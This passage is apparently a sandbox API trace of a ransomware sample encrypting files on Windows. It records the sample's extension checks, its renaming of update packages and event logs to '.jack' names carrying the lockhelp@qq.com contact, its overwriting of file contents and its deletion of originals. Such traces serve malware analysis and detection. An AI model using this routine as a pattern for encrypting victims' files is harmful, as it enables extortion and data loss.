(lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.359] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.359] lstrlenW (lpString=".doc") returned 4 [0204.359] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0204.359] lstrlenW (lpString=".docx") returned 5 [0204.359] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0204.359] lstrlenW (lpString=".pdf") returned 4 [0204.359] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0204.359] lstrlenW (lpString=".xls") returned 4 [0204.359] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0204.359] lstrlenW (lpString=".xlsx") returned 5 [0204.359] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0204.359] lstrlenW (lpString=".ppt") returned 4 [0204.359] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0204.359] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.359] lstrlenW (lpString=".zip") returned 4 [0204.359] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0204.360] lstrlenW (lpString=".rar") returned 4 [0204.360] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0204.360] lstrlenW (lpString=".bz2") returned 4 [0204.360] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0204.360] lstrlenW (lpString=".7z") returned 3 [0204.360] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0204.360] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.360] lstrlenW (lpString=".dbf") returned 4 [0204.360] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0204.360] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.360] lstrlenW (lpString=".1cd") returned 4 [0204.360] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0204.360] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.360] lstrlenW (lpString=".jpg") returned 4 [0204.360] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0204.360] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.360] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.360] lstrlenW (lpString=".doc") returned 4 [0204.360] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0204.360] lstrlenW (lpString=".docx") returned 5 [0204.360] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0204.360] lstrlenW (lpString=".pdf") returned 4 [0204.360] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0204.360] lstrlenW (lpString=".xls") returned 4 [0204.360] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0204.360] lstrlenW (lpString=".xlsx") returned 5 [0204.360] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0204.360] lstrlenW (lpString=".ppt") returned 4 [0204.360] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0204.360] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.360] lstrlenW (lpString=".zip") returned 4 [0204.360] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0204.360] lstrlenW (lpString=".rar") returned 4 [0204.360] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0204.360] lstrlenW (lpString=".bz2") returned 4 [0204.361] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0204.361] lstrlenW (lpString=".7z") returned 3 [0204.361] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0204.361] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.361] lstrlenW (lpString=".dbf") returned 4 [0204.361] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0204.361] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.361] lstrlenW (lpString=".1cd") returned 4 [0204.361] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0204.361] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 55 [0204.361] lstrlenW (lpString=".jpg") returned 4 [0204.361] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0204.361] lstrcmpiW (lpString1=".msu", lpString2=".jack") returned 1 [0204.361] lstrlenW (lpString="Windows6.1-KB958488-v6001-x86.msu") returned 33 [0204.361] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0204.361] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=2141433) returned 1 [0204.361] CloseHandle (hObject=0x404) returned 1 [0204.361] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu")) returned 0x80 [0204.361] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0204.362] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id-b4197730.[lockhelp@qq.com].jack")) returned 1 [0204.362] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x86.msu.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0204.362] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc64 | out: lpNewFilePointer=0x0) returned 1 [0204.362] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc24 | out: lpNewFilePointer=0x0) returned 1 [0204.362] ReadFile (in: hFile=0x404, lpBuffer=0x3dff058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3dff058*, lpNumberOfBytesRead=0x32dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0204.535] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0xae453, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc24 | out: lpNewFilePointer=0x0) returned 1 [0204.535] ReadFile (in: hFile=0x404, lpBuffer=0x3e3f058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3e3f058*, lpNumberOfBytesRead=0x32dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0204.539] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32dfc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0204.540] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x1cacf9, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc24 | out: lpNewFilePointer=0x0) returned 1 [0204.540] ReadFile (in: hFile=0x404, lpBuffer=0x3e7f058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32dfc30, lpOverlapped=0x0 | out: lpBuffer=0x3e7f058*, lpNumberOfBytesRead=0x32dfc30*=0x40000, lpOverlapped=0x0) returned 1 [0204.711] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.711] WriteFile (in: hFile=0x404, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x32dfca8, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfca8*=0xc012e, lpOverlapped=0x0) returned 1 [0205.018] SetEndOfFile (hFile=0x404) returned 1 [0205.018] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40000) returned 0x4031e28 [0205.022] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc74 | out: lpNewFilePointer=0x0) returned 1 [0205.023] WriteFile (in: hFile=0x404, lpBuffer=0x4031e28*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32dfc80, lpOverlapped=0x0 | out: lpBuffer=0x4031e28*, lpNumberOfBytesWritten=0x32dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0205.024] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0xae453, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc74 | out: lpNewFilePointer=0x0) returned 1 [0205.024] WriteFile (in: hFile=0x404, lpBuffer=0x4031e28*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32dfc80, lpOverlapped=0x0 | out: lpBuffer=0x4031e28*, lpNumberOfBytesWritten=0x32dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0205.027] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x1cacf9, lpNewFilePointer=0x0, dwMoveMethod=0x32dfc74 | out: lpNewFilePointer=0x0) returned 1 [0205.027] WriteFile (in: hFile=0x404, lpBuffer=0x4031e28*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32dfc80, lpOverlapped=0x0 | out: lpBuffer=0x4031e28*, lpNumberOfBytesWritten=0x32dfc80*=0x40000, lpOverlapped=0x0) returned 1 [0205.037] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4031e28 | out: hHeap=0x5e0000) returned 1 [0205.037] CloseHandle (hObject=0x404) returned 1 [0205.727] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0205.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.728] lstrlenW (lpString=".doc") returned 4 [0205.728] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0205.728] lstrlenW (lpString=".docx") returned 5 [0205.728] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0205.728] lstrlenW (lpString=".pdf") returned 4 [0205.728] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0205.728] lstrlenW (lpString=".xls") returned 4 [0205.728] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0205.728] lstrlenW (lpString=".xlsx") returned 5 [0205.728] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0205.728] lstrlenW (lpString=".ppt") returned 4 [0205.728] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0205.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.728] lstrlenW (lpString=".zip") returned 4 [0205.728] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0205.728] lstrlenW (lpString=".rar") returned 4 [0205.728] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0205.728] lstrlenW (lpString=".bz2") returned 4 [0205.728] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0205.728] lstrlenW (lpString=".7z") returned 3 [0205.728] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0205.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.728] lstrlenW (lpString=".dbf") returned 4 [0205.728] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0205.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.728] lstrlenW (lpString=".1cd") returned 4 [0205.728] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0205.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.728] lstrlenW (lpString=".jpg") returned 4 [0205.729] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0205.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.729] lstrlenW (lpString=".doc") returned 4 [0205.729] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0205.729] lstrlenW (lpString=".docx") returned 5 [0205.729] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0205.729] lstrlenW (lpString=".pdf") returned 4 [0205.729] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0205.729] lstrlenW (lpString=".xls") returned 4 [0205.729] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0205.729] lstrlenW (lpString=".xlsx") returned 5 [0205.729] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0205.729] lstrlenW (lpString=".ppt") returned 4 [0205.729] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0205.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.729] lstrlenW (lpString=".zip") returned 4 [0205.729] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0205.729] lstrlenW (lpString=".rar") returned 4 [0205.729] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0205.729] lstrlenW (lpString=".bz2") returned 4 [0205.729] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0205.729] lstrlenW (lpString=".7z") returned 3 [0205.729] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0205.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.729] lstrlenW (lpString=".dbf") returned 4 [0205.729] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0205.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.729] lstrlenW (lpString=".1cd") returned 4 [0205.729] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0205.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0205.729] lstrlenW (lpString=".jpg") returned 4 [0205.729] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0205.730] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.730] lstrlenW (lpString="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 71 [0205.730] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0205.730] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=1052672) returned 1 [0205.731] CloseHandle (hObject=0x404) returned 1 [0205.731] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx")) returned 0x20 [0205.731] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.731] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0205.731] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.731] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.731] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0205.731] GetLastError () returned 0x0 [0205.731] ReadFile (in: hFile=0x404, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0xffff0, lpOverlapped=0x0) returned 1 [0205.924] WriteFile (in: hFile=0x3dc, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xffff0, lpOverlapped=0x0) returned 1 [0206.054] ReadFile (in: hFile=0x404, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x1010, lpOverlapped=0x0) returned 1 [0206.063] WriteFile (in: hFile=0x3dc, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x1020, lpOverlapped=0x0) returned 1 [0206.068] ReadFile (in: hFile=0x404, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0206.068] WriteFile (in: hFile=0x3dc, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x162, lpOverlapped=0x0) returned 1 [0206.068] SetEndOfFile (hFile=0x3dc) returned 1 [0206.068] CloseHandle (hObject=0x3dc) returned 1 [0206.158] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.158] SetEndOfFile (hFile=0x404) returned 1 [0206.280] CloseHandle (hObject=0x404) returned 1 [0206.280] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0206.281] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx")) returned 1 [0206.281] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.281] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.281] lstrlenW (lpString=".doc") returned 4 [0206.281] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0206.281] lstrlenW (lpString=".docx") returned 5 [0206.281] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0206.281] lstrlenW (lpString=".pdf") returned 4 [0206.281] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0206.281] lstrlenW (lpString=".xls") returned 4 [0206.281] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0206.282] lstrlenW (lpString=".xlsx") returned 5 [0206.282] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0206.282] lstrlenW (lpString=".ppt") returned 4 [0206.282] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0206.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.282] lstrlenW (lpString=".zip") returned 4 [0206.282] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0206.282] lstrlenW (lpString=".rar") returned 4 [0206.282] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0206.282] lstrlenW (lpString=".bz2") returned 4 [0206.282] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0206.282] lstrlenW (lpString=".7z") returned 3 [0206.282] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0206.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.282] lstrlenW (lpString=".dbf") returned 4 [0206.282] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0206.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.282] lstrlenW (lpString=".1cd") returned 4 [0206.282] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0206.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.282] lstrlenW (lpString=".jpg") returned 4 [0206.282] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0206.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.282] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.282] lstrlenW (lpString=".doc") returned 4 [0206.282] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0206.282] lstrlenW (lpString=".docx") returned 5 [0206.282] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0206.282] lstrlenW (lpString=".pdf") returned 4 [0206.283] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0206.283] lstrlenW (lpString=".xls") returned 4 [0206.283] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0206.283] lstrlenW (lpString=".xlsx") returned 5 [0206.283] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0206.283] lstrlenW (lpString=".ppt") returned 4 [0206.283] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0206.283] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.283] lstrlenW (lpString=".zip") returned 4 [0206.283] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0206.283] lstrlenW (lpString=".rar") returned 4 [0206.283] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0206.283] lstrlenW (lpString=".bz2") returned 4 [0206.283] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0206.283] lstrlenW (lpString=".7z") returned 3 [0206.283] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0206.283] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.283] lstrlenW (lpString=".dbf") returned 4 [0206.283] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0206.283] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.283] lstrlenW (lpString=".1cd") returned 4 [0206.283] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0206.283] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned 79 [0206.283] lstrlenW (lpString=".jpg") returned 4 [0206.283] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0206.284] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0206.284] lstrlenW (lpString="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 55 [0206.284] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0206.285] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=69632) returned 1 [0206.285] CloseHandle (hObject=0x404) returned 1 [0206.285] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx")) returned 0x20 [0206.285] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0206.285] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0206.285] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.285] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0206.285] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0206.285] GetLastError () returned 0x0 [0206.286] ReadFile (in: hFile=0x404, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0206.288] WriteFile (in: hFile=0x3dc, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0206.290] ReadFile (in: hFile=0x404, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 